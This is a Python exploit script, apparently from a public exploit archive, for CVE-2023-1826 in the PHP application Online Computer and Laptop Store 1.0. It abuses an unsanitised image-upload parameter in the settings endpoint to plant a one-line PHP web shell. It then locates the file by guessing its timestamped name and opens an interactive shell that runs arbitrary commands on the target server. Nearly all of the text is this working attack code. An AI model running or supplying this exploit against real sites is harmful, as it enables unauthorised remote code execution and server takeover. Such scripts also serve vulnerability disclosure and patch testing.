Online Computer And Laptop Store 1.0 Shell Upload

`#!/usr/bin/env python3  
  
# Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)  
# Date: 09/04/2023  
# Exploit Author: Matisse Beckandt (Backendt)  
# Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip  
# Version: 1.0  
# Tested on: Debian 11.6  
# CVE : CVE-2023-1826  
  
# Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.  
import requests  
from argparse import ArgumentParser  
from uuid import uuid4  
from datetime import datetime, timezone  
  
def interactiveShell(fileUrl: str):  
print("Entering pseudo-shell. Type 'exit' to quit")  
while True:  
command = input("\n$ ")  
if command == "exit":  
break  
  
response = requests.get(f"{fileUrl}?cmd={command}")  
print(response.text)  
  
def uploadFile(url: str, filename: str, content):  
endpoint = f"{url}/classes/SystemSettings.php?f=update_settings"  
file = {"img": (filename, content)}  
  
response = requests.post(endpoint, files=file)  
return response  
  
def getUploadedFileUrl(url: str, filename: str):  
timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes  
epoch = int(timeNow.timestamp()) # Time in milliseconds  
possibleFilename = f"{epoch}_{filename}"  
fileUrl = f"{url}/uploads/{possibleFilename}"  
response = requests.get(fileUrl)  
if response.status_code == 200:  
return fileUrl  
  
def exploit(url: str):  
filename = str(uuid4()) + ".php"  
content = "<?php system($_GET['cmd'])?>"  
response = uploadFile(url, filename, content)  
  
if response.status_code != 200:  
print(f"[File Upload] Got status code {response.status_code}. Expected 200.")  
  
uploadedUrl = getUploadedFileUrl(url, filename)  
if uploadedUrl == None:  
print("Error. Could not find the uploaded file.")  
exit(1)  
print(f"Uploaded file is at {uploadedUrl}")  
  
try:  
interactiveShell(uploadedUrl)  
except KeyboardInterrupt:  
pass  
print("\nQuitting.")  
  
def getWebsiteURL(url: str):  
if not url.startswith("http"):  
url = "http://" + url  
if url.endswith("/"):  
url = url[:-1]  
return url  
  
def main():  
parser = ArgumentParser(description="Exploit for CVE-2023-1826")  
parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/")  
args = parser.parse_args()  
  
url = getWebsiteURL(args.url)  
exploit(url)  
  
if __name__ == "__main__":  
main()  
  
  
`